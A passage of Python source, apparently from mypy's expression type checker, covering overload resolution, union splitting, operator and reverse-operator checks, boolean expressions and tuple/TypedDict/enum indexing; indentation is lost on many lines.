        for typ in plausible_targets:
            overload_messages = self.msg.clean_copy()
            prev_messages = self.msg
            assert self.msg is self.chk.msg
            # Temporarily redirect ALL error output (both ours and the outer
            # checker's) into a throwaway builder, so a non-matching
            # alternative never produces user-visible errors.
            self.msg = overload_messages
            self.chk.msg = overload_messages
            try:
                # Passing `overload_messages` as the `arg_messages` parameter doesn't
                # seem to reliably catch all possible errors.
                # TODO: Figure out why
                ret_type, infer_type = self.check_call(
                    callee=typ,
                    args=args,
                    arg_kinds=arg_kinds,
                    arg_names=arg_names,
                    context=context,
                    arg_messages=overload_messages,
                    callable_name=callable_name,
                    object_type=object_type)
            finally:
                # Always restore the real message builders, even on crashes.
                self.chk.msg = prev_messages
                self.msg = prev_messages
            is_match = not overload_messages.is_errors()
            if is_match:
                # Return early if possible; otherwise record info so we can
                # check for ambiguity due to 'Any' below.
                if not args_contain_any:
                    return ret_type, infer_type
                matches.append(typ)
                return_types.append(ret_type)
                inferred_types.append(infer_type)
        if len(matches) == 0:
            # No match was found
            return None
        elif any_causes_overload_ambiguity(matches, return_types, arg_types, arg_kinds, arg_names):
            # An argument of type or containing the type 'Any' caused ambiguity.
            # We try returning a precise type if we can. If not, we give up and just return 'Any'.
            if all_same_types(return_types):
                return return_types[0], inferred_types[0]
            elif all_same_types(erase_type(typ) for typ in return_types):
                return erase_type(return_types[0]), erase_type(inferred_types[0])
            else:
                return self.check_call(callee=AnyType(TypeOfAny.special_form),
                                       args=args,
                                       arg_kinds=arg_kinds,
                                       arg_names=arg_names,
                                       context=context,
                                       arg_messages=arg_messages,
                                       callable_name=callable_name,
                                       object_type=object_type)
        else:
            # Success! No ambiguity; return the first match.
            return return_types[0], inferred_types[0]
def overload_erased_call_targets(self,
plausible_targets: List[CallableType],
arg_types: List[Type],
arg_kinds: List[int],
arg_names: Optional[Sequence[Optional[str]]],
context: Context) -> List[CallableType]:
"""Returns a list of all targets that match the caller after erasing types.
Assumes all of the given targets have argument counts compatible with the caller.
"""
matches = [] # type: List[CallableType]
for typ in plausible_targets:
if self.erased_signature_similarity(arg_types, arg_kinds, arg_names, typ, context):
matches.append(typ)
return matches
    def union_overload_result(self,
                              plausible_targets: List[CallableType],
                              args: List[Expression],
                              arg_types: List[Type],
                              arg_kinds: List[int],
                              arg_names: Optional[Sequence[Optional[str]]],
                              callable_name: Optional[str],
                              object_type: Optional[Type],
                              context: Context,
                              arg_messages: Optional[MessageBuilder] = None,
                              level: int = 0
                              ) -> Optional[List[Tuple[Type, Type]]]:
        """Accepts a list of overload signatures and attempts to match calls by destructuring
        the first union.

        Return a list of (<return type>, <inferred variant type>) if call succeeds for every
        item of the destructured union. Returns None if there is no match.

        'level' is the current recursion depth; raises TooManyUnions past MAX_UNIONS.
        """
        # Step 1: If we are already too deep, then stop immediately. Otherwise mypy might
        #         hang for long time because of a weird overload call. The caller will get
        #         the exception and generate an appropriate note message, if needed.
        if level >= MAX_UNIONS:
            raise TooManyUnions
        # Step 2: Find position of the first union in arguments. Return the normal inferred
        #         type if no more unions left.
        for idx, typ in enumerate(arg_types):
            if self.real_union(typ):
                break
        else:
            # No unions in args, just fall back to normal inference
            with self.type_overrides_set(args, arg_types):
                res = self.infer_overload_return_type(plausible_targets, args, arg_types,
                                                      arg_kinds, arg_names, callable_name,
                                                      object_type, context, arg_messages)
            if res is not None:
                return [res]
            return None
        # Step 3: Try a direct match before splitting to avoid unnecessary union splits
        #         and save performance.
        with self.type_overrides_set(args, arg_types):
            direct = self.infer_overload_return_type(plausible_targets, args, arg_types,
                                                     arg_kinds, arg_names, callable_name,
                                                     object_type, context, arg_messages)
        if direct is not None and not isinstance(direct[0], (UnionType, AnyType)):
            # We only return non-unions soon, to avoid greedy match.
            return [direct]
        # Step 4: Split the first remaining union type in arguments into items and
        #         try to match each item individually (recursive).
        first_union = arg_types[idx]
        assert isinstance(first_union, UnionType)
        res_items = []
        for item in first_union.relevant_items():
            new_arg_types = arg_types.copy()
            new_arg_types[idx] = item
            sub_result = self.union_overload_result(plausible_targets, args, new_arg_types,
                                                    arg_kinds, arg_names, callable_name,
                                                    object_type, context, arg_messages,
                                                    level + 1)
            if sub_result is not None:
                res_items.extend(sub_result)
            else:
                # Some item doesn't match, return soon.
                return None
        # Step 5: If splitting succeeded, then filter out duplicate items before returning.
        seen = set()  # type: Set[Tuple[Type, Type]]
        result = []
        for pair in res_items:
            if pair not in seen:
                seen.add(pair)
                result.append(pair)
        return result
def real_union(self, typ: Type) -> bool:
return isinstance(typ, UnionType) and len(typ.relevant_items()) > 1
@contextmanager
def type_overrides_set(self, exprs: Sequence[Expression],
overrides: Sequence[Type]) -> Iterator[None]:
"""Set _temporary_ type overrides for given expressions."""
assert len(exprs) == len(overrides)
for expr, typ in zip(exprs, overrides):
self.type_overrides[expr] = typ
try:
yield
finally:
for expr in exprs:
del self.type_overrides[expr]
    def combine_function_signatures(self, types: Sequence[Type]) -> Union[AnyType, CallableType]:
        """Accepts a list of function signatures and attempts to combine them together into a
        new CallableType consisting of the union of all of the given arguments and return types.

        If there is at least one non-callable type, return Any (this can happen if there is
        an ambiguity because of Any in arguments).
        """
        assert types, "Trying to merge no callables"
        if not all(isinstance(c, CallableType) for c in types):
            return AnyType(TypeOfAny.special_form)
        callables = cast(Sequence[CallableType], types)
        if len(callables) == 1:
            return callables[0]
        # Note: we are assuming here that if a user uses some TypeVar 'T' in
        # two different functions, they meant for that TypeVar to mean the
        # same thing.
        #
        # This function will make sure that all instances of that TypeVar 'T'
        # refer to the same underlying TypeVarType and TypeVarDef objects to
        # simplify the union-ing logic below.
        #
        # (If the user did *not* mean for 'T' to be consistently bound to the
        # same type in their overloads, well, their code is probably too
        # confusing and ought to be re-written anyways.)
        callables, variables = merge_typevars_in_callables_by_name(callables)
        new_args = [[] for _ in range(len(callables[0].arg_types))]  # type: List[List[Type]]
        new_kinds = list(callables[0].arg_kinds)
        new_returns = []  # type: List[Type]
        too_complex = False
        for target in callables:
            # We fall back to Callable[..., Union[<returns>]] if the functions do not have
            # the exact same signature. The only exception is if one arg is optional and
            # the other is positional: in that case, we continue unioning (and expect a
            # positional arg).
            # TODO: Enhance the merging logic to handle a wider variety of signatures.
            if len(new_kinds) != len(target.arg_kinds):
                too_complex = True
                break
            for i, (new_kind, target_kind) in enumerate(zip(new_kinds, target.arg_kinds)):
                if new_kind == target_kind:
                    continue
                elif new_kind in (ARG_POS, ARG_OPT) and target_kind in (ARG_POS, ARG_OPT):
                    new_kinds[i] = ARG_POS
                else:
                    too_complex = True
                    break
            if too_complex:
                break  # outer loop
            for i, arg in enumerate(target.arg_types):
                new_args[i].append(arg)
            new_returns.append(target.ret_type)
        union_return = UnionType.make_simplified_union(new_returns)
        if too_complex:
            # Fall back to a '(*Any, **Any) -> Union[<returns>]' signature.
            # (NOTE: 'any' deliberately shadows the builtin within this branch.)
            any = AnyType(TypeOfAny.special_form)
            return callables[0].copy_modified(
                arg_types=[any, any],
                arg_kinds=[ARG_STAR, ARG_STAR2],
                arg_names=[None, None],
                ret_type=union_return,
                variables=variables,
                implicit=True)
        final_args = []
        for args_list in new_args:
            new_type = UnionType.make_simplified_union(args_list)
            final_args.append(new_type)
        return callables[0].copy_modified(
            arg_types=final_args,
            arg_kinds=new_kinds,
            ret_type=union_return,
            variables=variables,
            implicit=True)
    def erased_signature_similarity(self, arg_types: List[Type], arg_kinds: List[int],
                                    arg_names: Optional[Sequence[Optional[str]]],
                                    callee: CallableType,
                                    context: Context) -> bool:
        """Determine whether arguments could match the signature at runtime, after
        erasing types."""
        formal_to_actual = map_actuals_to_formals(arg_kinds,
                                                  arg_names,
                                                  callee.arg_kinds,
                                                  callee.arg_names,
                                                  lambda i: arg_types[i])
        if not self.check_argument_count(callee, arg_types, arg_kinds, arg_names,
                                         formal_to_actual, None, None):
            # Too few or many arguments -> no match.
            return False
        # This nested callback aborts the whole check with the Finished
        # exception as soon as a single argument fails the similarity test.
        def check_arg(caller_type: Type, original_caller_type: Type, caller_kind: int,
                      callee_type: Type, n: int, m: int, callee: CallableType,
                      context: Context, messages: MessageBuilder) -> None:
            if not arg_approximate_similarity(caller_type, callee_type):
                # No match -- exit early since none of the remaining work can change
                # the result.
                raise Finished
        try:
            self.check_argument_types(arg_types, arg_kinds, callee,
                                      formal_to_actual, context=context, check_arg=check_arg)
            return True
        except Finished:
            return False
    def apply_generic_arguments(self, callable: CallableType, types: Sequence[Optional[Type]],
                                context: Context, skip_unsatisfied: bool = False) -> CallableType:
        """Simple wrapper around mypy.applytype.apply_generic_arguments.

        Substitutes 'types' for the type variables of 'callable', reporting any
        errors through self.msg at the given context.
        """
        return applytype.apply_generic_arguments(callable, types, self.msg, context,
                                                 skip_unsatisfied=skip_unsatisfied)
def visit_member_expr(self, e: MemberExpr, is_lvalue: bool = False) -> Type:
"""Visit member expression (of form e.id)."""
self.chk.module_refs.update(extract_refexpr_names(e))
result = self.analyze_ordinary_member_access(e, is_lvalue)
return self.narrow_type_from_binder(e, result)
def analyze_ordinary_member_access(self, e: MemberExpr,
is_lvalue: bool) -> Type:
"""Analyse member expression or member lvalue."""
if e.kind is not None:
# This is a reference to a module attribute.
return self.analyze_ref_expr(e)
else:
# This is a reference to a non-module attribute.
original_type = self.accept(e.expr)
member_type = analyze_member_access(
e.name, original_type, e, is_lvalue, False, False,
self.named_type, self.not_ready_callback, self.msg,
original_type=original_type, chk=self.chk)
return member_type
    def analyze_external_member_access(self, member: str, base_type: Type,
                                       context: Context) -> Type:
        """Analyse member access that is external, i.e. it cannot
        refer to private definitions. Return the result type.
        """
        # TODO remove; no private definitions in mypy
        return analyze_member_access(member, base_type, context, False, False, False,
                                     self.named_type, self.not_ready_callback, self.msg,
                                     original_type=base_type, chk=self.chk)
def visit_int_expr(self, e: IntExpr) -> Type:
"""Type check an integer literal (trivial)."""
return self.named_type('builtins.int')
def visit_str_expr(self, e: StrExpr) -> Type:
"""Type check a string literal (trivial)."""
return self.named_type('builtins.str')
def visit_bytes_expr(self, e: BytesExpr) -> Type:
"""Type check a bytes literal (trivial)."""
return self.named_type('builtins.bytes')
def visit_unicode_expr(self, e: UnicodeExpr) -> Type:
"""Type check a unicode literal (trivial)."""
return self.named_type('builtins.unicode')
def visit_float_expr(self, e: FloatExpr) -> Type:
"""Type check a float literal (trivial)."""
return self.named_type('builtins.float')
def visit_complex_expr(self, e: ComplexExpr) -> Type:
"""Type check a complex literal."""
return self.named_type('builtins.complex')
def visit_ellipsis(self, e: EllipsisExpr) -> Type:
"""Type check '...'."""
if self.chk.options.python_version[0] >= 3:
return self.named_type('builtins.ellipsis')
else:
# '...' is not valid in normal Python 2 code, but it can
# be used in stubs. The parser makes sure that we only
# get this far if we are in a stub, and we can safely
# return 'object' as ellipsis is special cased elsewhere.
# The builtins.ellipsis type does not exist in Python 2.
return self.named_type('builtins.object')
    def visit_op_expr(self, e: OpExpr) -> Type:
        """Type check a binary operator expression."""
        if e.op == 'and' or e.op == 'or':
            return self.check_boolean_op(e, e)
        if e.op == '*' and isinstance(e.left, ListExpr):
            # Expressions of form [...] * e get special type inference.
            return self.check_list_multiply(e)
        if e.op == '%':
            # '%' on a string/bytes literal goes through the string
            # interpolation checker for a more precise result type.
            # (Bytes interpolation only exists on Python >= 3.5.)
            pyversion = self.chk.options.python_version
            if pyversion[0] == 3:
                if isinstance(e.left, BytesExpr) and pyversion[1] >= 5:
                    return self.strfrm_checker.check_str_interpolation(e.left, e.right)
                if isinstance(e.left, StrExpr):
                    return self.strfrm_checker.check_str_interpolation(e.left, e.right)
            elif pyversion[0] <= 2:
                if isinstance(e.left, (StrExpr, BytesExpr, UnicodeExpr)):
                    return self.strfrm_checker.check_str_interpolation(e.left, e.right)
        left_type = self.accept(e.left)
        if e.op in nodes.op_methods:
            # Everything else maps to a dunder method call (with reverse
            # variants like __radd__ also considered).
            method = self.get_operator_method(e.op)
            result, method_type = self.check_op(method, left_type, e.right, e,
                                                allow_reverse=True)
            e.method_type = method_type
            return result
        else:
            raise RuntimeError('Unknown operator {}'.format(e.op))
    def visit_comparison_expr(self, e: ComparisonExpr) -> Type:
        """Type check a comparison expression.

        Comparison expressions are type checked consecutive-pair-wise
        That is, 'a < b > c == d' is checked as 'a < b and b > c and c == d'
        """
        result = None  # type: Optional[Type]
        # Check each consecutive operand pair and their operator
        for left, right, operator in zip(e.operands, e.operands[1:], e.operators):
            left_type = self.accept(left)
            method_type = None  # type: Optional[mypy.types.Type]
            if operator == 'in' or operator == 'not in':
                right_type = self.accept(right)  # always validate the right operand
                # Keep track of whether we get type check errors (these won't be reported, they
                # are just to verify whether something is valid typing wise).
                local_errors = self.msg.copy()
                local_errors.disable_count = 0
                # First try the __contains__ protocol.
                sub_result, method_type = self.check_method_call_by_name(
                    '__contains__', right_type, [left], [ARG_POS], e, local_errors)
                if isinstance(right_type, PartialType):
                    # We don't really know if this is an error or not, so just shut up.
                    pass
                elif (local_errors.is_errors() and
                    # is_valid_var_arg is True for any Iterable
                        self.is_valid_var_arg(right_type)):
                    # No __contains__, but the right operand is iterable:
                    # fall back to iteration-based membership and synthesize
                    # a '(left_type) -> bool' method type.
                    _, itertype = self.chk.analyze_iterable_item_type(right)
                    method_type = CallableType(
                        [left_type],
                        [nodes.ARG_POS],
                        [None],
                        self.bool_type(),
                        self.named_type('builtins.function'))
                    sub_result = self.bool_type()
                    if not is_subtype(left_type, itertype):
                        self.msg.unsupported_operand_types('in', left_type, right_type, e)
                else:
                    self.msg.add_errors(local_errors)
                if operator == 'not in':
                    sub_result = self.bool_type()
            elif operator in nodes.op_methods:
                method = self.get_operator_method(operator)
                sub_result, method_type = self.check_op(method, left_type, right, e,
                                                        allow_reverse=True)
            elif operator == 'is' or operator == 'is not':
                # Identity comparisons always produce bool and use no method.
                self.accept(right)  # validate the right operand
                sub_result = self.bool_type()
                method_type = None
            else:
                raise RuntimeError('Unknown comparison operator {}'.format(operator))
            e.method_types.append(method_type)
            # Determine type of boolean-and of result and sub_result
            if result is None:
                result = sub_result
            else:
                result = join.join_types(result, sub_result)
        assert result is not None
        return result
def get_operator_method(self, op: str) -> str:
if op == '/' and self.chk.options.python_version[0] == 2:
# TODO also check for "from __future__ import division"
return '__div__'
else:
return nodes.op_methods[op]
def check_method_call_by_name(self,
method: str,
base_type: Type,
args: List[Expression],
arg_kinds: List[int],
context: Context,
local_errors: Optional[MessageBuilder] = None,
) -> Tuple[Type, Type]:
"""Type check a call to a named method on an object.
Return tuple (result type, inferred method type).
"""
local_errors = local_errors or self.msg
method_type = analyze_member_access(method, base_type, context, False, False, True,
self.named_type, self.not_ready_callback, local_errors,
original_type=base_type, chk=self.chk)
return self.check_method_call(
method, base_type, method_type, args, arg_kinds, context, local_errors)
def check_method_call(self,
method_name: str,
base_type: Type,
method_type: Type,
args: List[Expression],
arg_kinds: List[int],
context: Context,
local_errors: Optional[MessageBuilder] = None) -> Tuple[Type, Type]:
"""Type check a call to a method with the given name and type on an object.
Return tuple (result type, inferred method type).
"""
callable_name = self.method_fullname(base_type, method_name)
object_type = base_type if callable_name is not None else None
# Try to refine the method signature using plugin hooks before checking the call.
method_type = self.transform_callee_type(
callable_name, method_type, args, arg_kinds, context, object_type=object_type)
return self.check_call(method_type, args, arg_kinds,
context, arg_messages=local_errors,
callable_name=callable_name, object_type=object_type)
    def check_op_reversible(self,
                            op_name: str,
                            left_type: Type,
                            left_expr: Expression,
                            right_type: Type,
                            right_expr: Expression,
                            context: Context,
                            msg: MessageBuilder) -> Tuple[Type, Type]:
        """Type check a binary operation, trying the forward (__op__) and
        reverse (__rop__) methods in the order Python would at runtime.

        Return tuple (result type, inferred operator method type).
        """
        def make_local_errors() -> MessageBuilder:
            """Creates a new MessageBuilder object."""
            local_errors = msg.clean_copy()
            local_errors.disable_count = 0
            return local_errors
        def lookup_operator(op_name: str, base_type: Type) -> Optional[Type]:
            """Looks up the given operator and returns the corresponding type,
            if it exists."""
            local_errors = make_local_errors()
            # TODO: Remove this call and rely just on analyze_member_access
            # Currently, it seems we still need this to correctly deal with
            # things like metaclasses?
            #
            # E.g. see the pythoneval.testMetaclassOpAccessAny test case.
            if not self.has_member(base_type, op_name):
                return None
            member = analyze_member_access(
                name=op_name,
                typ=base_type,
                node=context,
                is_lvalue=False,
                is_super=False,
                is_operator=True,
                builtin_type=self.named_type,
                not_ready_callback=self.not_ready_callback,
                msg=local_errors,
                original_type=base_type,
                chk=self.chk,
            )
            if local_errors.is_errors():
                return None
            else:
                return member
        def lookup_definer(typ: Instance, attr_name: str) -> Optional[str]:
            """Returns the name of the class that contains the actual definition of attr_name.

            So if class A defines foo and class B subclasses A, running
            'lookup_definer(B, "foo")' would return the full name of A.

            However, if B were to override and redefine foo, that method call would
            return the full name of B instead.

            If the attr name is not present in the given class or its MRO, returns None.
            """
            for cls in typ.type.mro:
                if cls.names.get(attr_name):
                    return cls.fullname()
            return None
        # If either the LHS or the RHS are Any, we can't really conclude anything
        # about the operation since the Any type may or may not define an
        # __op__ or __rop__ method. So, we punt and return Any instead.
        if isinstance(left_type, AnyType):
            any_type = AnyType(TypeOfAny.from_another_any, source_any=left_type)
            return any_type, any_type
        if isinstance(right_type, AnyType):
            any_type = AnyType(TypeOfAny.from_another_any, source_any=right_type)
            return any_type, any_type
        # STEP 1:
        # We start by getting the __op__ and __rop__ methods, if they exist.
        rev_op_name = self.get_reverse_op_method(op_name)
        left_op = lookup_operator(op_name, left_type)
        right_op = lookup_operator(rev_op_name, right_type)
        # STEP 2a:
        # We figure out in which order Python will call the operator methods. As it
        # turns out, it's not as simple as just trying to call __op__ first and
        # __rop__ second.
        #
        # We store the determined order inside the 'variants_raw' variable,
        # which records tuples containing the method, base type, and the argument.
        bias_right = is_proper_subtype(right_type, left_type)
        if op_name in nodes.op_methods_that_shortcut and is_same_type(left_type, right_type):
            # When we do "A() + A()", for example, Python will only call the __add__ method,
            # never the __radd__ method.
            #
            # This is the case even if the __add__ method is completely missing and the __radd__
            # method is defined.
            variants_raw = [
                (left_op, left_type, right_expr)
            ]
        elif (is_subtype(right_type, left_type)
                and isinstance(left_type, Instance)
                and isinstance(right_type, Instance)
                and lookup_definer(left_type, op_name) != lookup_definer(right_type, rev_op_name)):
            # When we do "A() + B()" where B is a subclass of A, we'll actually try calling
            # B's __radd__ method first, but ONLY if B explicitly defines or overrides the
            # __radd__ method.
            #
            # This mechanism lets subclasses "refine" the expected outcome of the operation, even
            # if they're located on the RHS.
            variants_raw = [
                (right_op, right_type, left_expr),
                (left_op, left_type, right_expr),
            ]
        else:
            # In all other cases, we do the usual thing and call __add__ first and
            # __radd__ second when doing "A() + B()".
            variants_raw = [
                (left_op, left_type, right_expr),
                (right_op, right_type, left_expr),
            ]
        # STEP 2b:
        # When running Python 2, we might also try calling the __cmp__ method.
        is_python_2 = self.chk.options.python_version[0] == 2
        if is_python_2 and op_name in nodes.ops_falling_back_to_cmp:
            cmp_method = nodes.comparison_fallback_method
            left_cmp_op = lookup_operator(cmp_method, left_type)
            right_cmp_op = lookup_operator(cmp_method, right_type)
            if bias_right:
                variants_raw.append((right_cmp_op, right_type, left_expr))
                variants_raw.append((left_cmp_op, left_type, right_expr))
            else:
                variants_raw.append((left_cmp_op, left_type, right_expr))
                variants_raw.append((right_cmp_op, right_type, left_expr))
        # STEP 3:
        # We now filter out all non-existent operators. The 'variants' list contains
        # all operator methods that are actually present, in the order that Python
        # attempts to invoke them.
        variants = [(op, obj, arg) for (op, obj, arg) in variants_raw if op is not None]
        # STEP 4:
        # We now try invoking each one. If an operation succeeds, end early and return
        # the corresponding result. Otherwise, return the result and errors associated
        # with the first entry.
        errors = []
        results = []
        for method, obj, arg in variants:
            local_errors = make_local_errors()
            result = self.check_method_call(
                op_name, obj, method, [arg], [ARG_POS], context, local_errors)
            if local_errors.is_errors():
                errors.append(local_errors)
                results.append(result)
            else:
                return result
        # STEP 4b:
        # Sometimes, the variants list is empty. In that case, we fall-back to attempting to
        # call the __op__ method (even though it's missing).
        if not variants:
            local_errors = make_local_errors()
            result = self.check_method_call_by_name(
                op_name, left_type, [right_expr], [ARG_POS], context, local_errors)
            if local_errors.is_errors():
                errors.append(local_errors)
                results.append(result)
            else:
                # In theory, we should never enter this case, but it seems
                # we sometimes do, when dealing with Type[...]? E.g. see
                # check-classes.testTypeTypeComparisonWorks.
                #
                # This is probably related to the TODO in lookup_operator(...)
                # up above.
                #
                # TODO: Remove this extra case
                return result
        msg.add_errors(errors[0])
        if len(results) == 1:
            return results[0]
        else:
            error_any = AnyType(TypeOfAny.from_error)
            result = error_any, error_any
            return result
    def check_op(self, method: str, base_type: Type,
                 arg: Expression, context: Context,
                 allow_reverse: bool = False) -> Tuple[Type, Type]:
        """Type check a binary operation which maps to a method call.

        Return tuple (result type, inferred operator method type).

        If allow_reverse is True, reverse (__r*__) operator methods are also
        considered and union operand types are destructured so that each union
        member is checked on its own.
        """
        if allow_reverse:
            left_variants = [base_type]
            if isinstance(base_type, UnionType):
                left_variants = [item for item in base_type.relevant_items()]
            right_type = self.accept(arg)
            # Step 1: We first try leaving the right arguments alone and destructure
            # just the left ones. (Mypy can sometimes perform some more precise inference
            # if we leave the right operands a union -- see testOperatorWithEmptyListAndSum.
            msg = self.msg.clean_copy()
            msg.disable_count = 0
            all_results = []
            all_inferred = []
            for left_possible_type in left_variants:
                result, inferred = self.check_op_reversible(
                    op_name=method,
                    left_type=left_possible_type,
                    left_expr=TempNode(left_possible_type),
                    right_type=right_type,
                    right_expr=arg,
                    context=context,
                    msg=msg)
                all_results.append(result)
                all_inferred.append(inferred)
            if not msg.is_errors():
                # Every member of the left union checked cleanly: union the
                # per-member results and we are done.
                results_final = UnionType.make_simplified_union(all_results)
                inferred_final = UnionType.make_simplified_union(all_inferred)
                return results_final, inferred_final
            # Step 2: If that fails, we try again but also destructure the right argument.
            # This is also necessary to make certain edge cases work -- see
            # testOperatorDoubleUnionInterwovenUnionAdd, for example.
            # Note: We want to pass in the original 'arg' for 'left_expr' and 'right_expr'
            # whenever possible so that plugins and similar things can introspect on the original
            # node if possible.
            #
            # We don't do the same for the base expression because it could lead to weird
            # type inference errors -- e.g. see 'testOperatorDoubleUnionSum'.
            # TODO: Can we use `type_overrides_set()` here?
            right_variants = [(right_type, arg)]
            if isinstance(right_type, UnionType):
                right_variants = [(item, TempNode(item)) for item in right_type.relevant_items()]
            msg = self.msg.clean_copy()
            msg.disable_count = 0
            all_results = []
            all_inferred = []
            for left_possible_type in left_variants:
                for right_possible_type, right_expr in right_variants:
                    result, inferred = self.check_op_reversible(
                        op_name=method,
                        left_type=left_possible_type,
                        left_expr=TempNode(left_possible_type),
                        right_type=right_possible_type,
                        right_expr=right_expr,
                        context=context,
                        msg=msg)
                    all_results.append(result)
                    all_inferred.append(inferred)
            if msg.is_errors():
                self.msg.add_errors(msg)
                # Point the user at whichever operand(s) were unions, since the
                # cross-product check above can make the root cause less obvious.
                if len(left_variants) >= 2 and len(right_variants) >= 2:
                    self.msg.warn_both_operands_are_from_unions(context)
                elif len(left_variants) >= 2:
                    self.msg.warn_operand_was_from_union("Left", base_type, context)
                elif len(right_variants) >= 2:
                    self.msg.warn_operand_was_from_union("Right", right_type, context)
            # See the comment in 'check_overload_call' for more details on why
            # we call 'combine_function_signature' instead of just unioning the inferred
            # callable types.
            results_final = UnionType.make_simplified_union(all_results)
            inferred_final = self.combine_function_signatures(all_inferred)
            return results_final, inferred_final
        else:
            # No reverse-operator handling requested: a plain method call check.
            return self.check_method_call_by_name(
                method=method,
                base_type=base_type,
                args=[arg],
                arg_kinds=[ARG_POS],
                context=context,
                local_errors=self.msg,
            )
def get_reverse_op_method(self, method: str) -> str:
if method == '__div__' and self.chk.options.python_version[0] == 2:
return '__rdiv__'
else:
return nodes.reverse_op_methods[method]
    def check_boolean_op(self, e: OpExpr, context: Context) -> Type:
        """Type check a boolean operation ('and' or 'or')."""
        # A boolean operation can evaluate to either of the operands.
        # We use the current type context to guide the type inference of
        # the left operand. We also use the left operand type to guide the type
        # inference of the right operand so that expressions such as
        # '[1] or []' are inferred correctly.
        ctx = self.type_context[-1]
        left_type = self.accept(e.left, ctx)
        assert e.op in ('and', 'or')  # Checked by visit_op_expr
        if e.op == 'and':
            # 'x and y' is x only when x is falsy, so restrict to the
            # falsy part of the left type.
            right_map, left_map = self.chk.find_isinstance_check(e.left)
            restricted_left_type = false_only(left_type)
            result_is_left = not left_type.can_be_true
        elif e.op == 'or':
            # Mirror image: 'x or y' is x only when x is truthy.
            left_map, right_map = self.chk.find_isinstance_check(e.left)
            restricted_left_type = true_only(left_type)
            result_is_left = not left_type.can_be_false
        if e.right_unreachable:
            right_map = None
        elif e.right_always:
            left_map = None
        # If right_map is None then we know mypy considers the right branch
        # to be unreachable and therefore any errors found in the right branch
        # should be suppressed.
        if right_map is None:
            self.msg.disable_errors()
        try:
            right_type = self.analyze_cond_branch(right_map, e.right, left_type)
        finally:
            if right_map is None:
                self.msg.enable_errors()
        if right_map is None:
            # The boolean expression is statically known to be the left value
            assert left_map is not None  # find_isinstance_check guarantees this
            return left_type
        if left_map is None:
            # The boolean expression is statically known to be the right value
            assert right_map is not None  # find_isinstance_check guarantees this
            return right_type
        if isinstance(restricted_left_type, UninhabitedType):
            # The left operand can never be the result
            return right_type
        elif result_is_left:
            # The left operand is always the result
            return left_type
        else:
            return UnionType.make_simplified_union([restricted_left_type, right_type])
def check_list_multiply(self, e: OpExpr) -> Type:
"""Type check an expression of form '[...] * e'.
Type inference is special-cased for this common construct.
"""
right_type = self.accept(e.right)
if is_subtype(right_type, self.named_type('builtins.int')):
# Special case: [...] * <int value>. Use the type context of the
# OpExpr, since the multiplication does not affect the type.
left_type = self.accept(e.left, type_context=self.type_context[-1])
else:
left_type = self.accept(e.left)
result, method_type = self.check_op('__mul__', left_type, e.right, e)
e.method_type = method_type
return result
def visit_unary_expr(self, e: UnaryExpr) -> Type:
"""Type check an unary operation ('not', '-', '+' or '~')."""
operand_type = self.accept(e.expr)
op = e.op
if op == 'not':
result = self.bool_type() # type: Type
else:
method = nodes.unary_op_methods[op]
result, method_type = self.check_method_call_by_name(method, operand_type, [], [], e)
e.method_type = method_type
return result
def visit_index_expr(self, e: IndexExpr) -> Type:
"""Type check an index expression (base[index]).
It may also represent type application.
"""
result = self.visit_index_expr_helper(e)
return self.narrow_type_from_binder(e, result)
    def visit_index_expr_helper(self, e: IndexExpr) -> Type:
        """Dispatch an index expression to the appropriate special case.

        Tuples, TypedDicts and enum classes get dedicated handling; everything
        else falls through to an ordinary '__getitem__' method call.
        """
        if e.analyzed:
            # It's actually a type application.
            return self.accept(e.analyzed)
        left_type = self.accept(e.base)
        if isinstance(left_type, TupleType) and self.chk.in_checked_function():
            # Special case for tuples. They return a more specific type when
            # indexed by an integer literal.
            index = e.index
            if isinstance(index, SliceExpr):
                return self.visit_tuple_slice_helper(left_type, index)
            n = self._get_value(index)
            if n is not None:
                if n < 0:
                    # Negative literal indices count from the end, matching
                    # runtime semantics.
                    n += len(left_type.items)
                if n >= 0 and n < len(left_type.items):
                    return left_type.items[n]
                else:
                    self.chk.fail(messages.TUPLE_INDEX_OUT_OF_RANGE, e)
                    return AnyType(TypeOfAny.from_error)
            else:
                # Non-literal index: fall back to the union of item types.
                return self.nonliteral_tuple_index_helper(left_type, index)
        elif isinstance(left_type, TypedDictType):
            return self.visit_typeddict_index_expr(left_type, e.index)
        elif (isinstance(left_type, CallableType)
              and left_type.is_type_obj() and left_type.type_object().is_enum):
            return self.visit_enum_index_expr(left_type.type_object(), e.index, e)
        else:
            result, method_type = self.check_method_call_by_name(
                '__getitem__', left_type, [e.index], [ARG_POS], e)
            e.method_type = method_type
            return result
def visit_tuple_slice_helper(self, left_type: TupleType, slic: SliceExpr) -> Type:
begin = None
end = None
stride = None
if slic.begin_index:
begin = self._get_value(slic.begin_index)
if begin is None:
return self.nonliteral_tuple_index_helper(left_type, slic)
if slic.end_index:
end = self._get_value(slic.end_index)
if end is None:
return self.nonliteral_tuple_index_helper(left_type, slic)
if slic.stride:
stride = self._get_value(slic.stride)
if stride is None:
return self.nonliteral_tuple_index_helper(left_type, slic)
return left_type.slice(begin, stride, end)
def nonliteral_tuple_index_helper(self, left_type: TupleType, index: Expression) -> Type:
index_type = self.accept(index)
expected_type = UnionType.make_union([self.named_type('builtins.int'),
self.named_type('builtins.slice')])
if not self.chk.check_subtype(index_type, expected_type, index,
messages.INVALID_TUPLE_INDEX_TYPE,
'actual type', 'expected type'):
return AnyType(TypeOfAny.from_error)
else:
return UnionType.make_simplified_union(left_type.items)
def _get_value(self, index: Expression) -> Optional[int]:
if isinstance(index, IntExpr):
return index.value
elif isinstance(index, UnaryExpr):
if index.op == '-':
operand = index.expr
if isinstance(operand, IntExpr):
return -1 * operand.value
return None
def visit_typeddict_index_expr(self, td_type: TypedDictType, index: Expression) -> Type:
if not isinstance(index, (StrExpr, UnicodeExpr)):
self.msg.typeddict_key_must_be_string_literal(td_type, index)
return AnyType(TypeOfAny.from_error)
item_name = index.value
item_type = td_type.items.get(item_name)
if item_type is None:
self.msg.typeddict_key_not_found(td_type, item_name, index)
return AnyType(TypeOfAny.from_error)
return item_type
def visit_enum_index_expr(self, enum_type: TypeInfo, index: Expression,
context: Context) -> Type:
string_type = self.named_type('builtins.str') # type: Type
if self.chk.options.python_version[0] < 3:
string_type = UnionType.make_union([string_type,
self.named_type('builtins.unicode')])
self.chk.check_subtype(self.accept(index), string_type, context,
"Enum index should be a string", "actual index type")
return Instance(enum_type, [])
def visit_cast_expr(self, expr: CastExpr) -> Type:
"""Type check a cast expression."""
source_type = self.accept(expr.expr, type_context=AnyType(TypeOfAny.special_form),
allow_none_return=True, always_allow_any=True)
